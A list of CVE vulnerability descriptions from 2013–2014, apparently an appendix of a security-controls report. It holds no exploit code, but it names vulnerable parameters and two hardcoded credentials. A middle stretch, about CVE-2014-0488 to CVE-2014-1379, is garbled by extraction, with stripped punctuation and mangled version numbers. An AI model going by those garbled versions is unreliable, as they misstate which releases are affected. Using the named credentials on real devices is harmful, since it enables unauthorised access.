CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.
CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.
CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.
CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.
CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.
CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382 WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466 SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472 Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477 Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518 Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563 Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565 The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586 content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701 The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740 Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744 Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753 Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806 The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
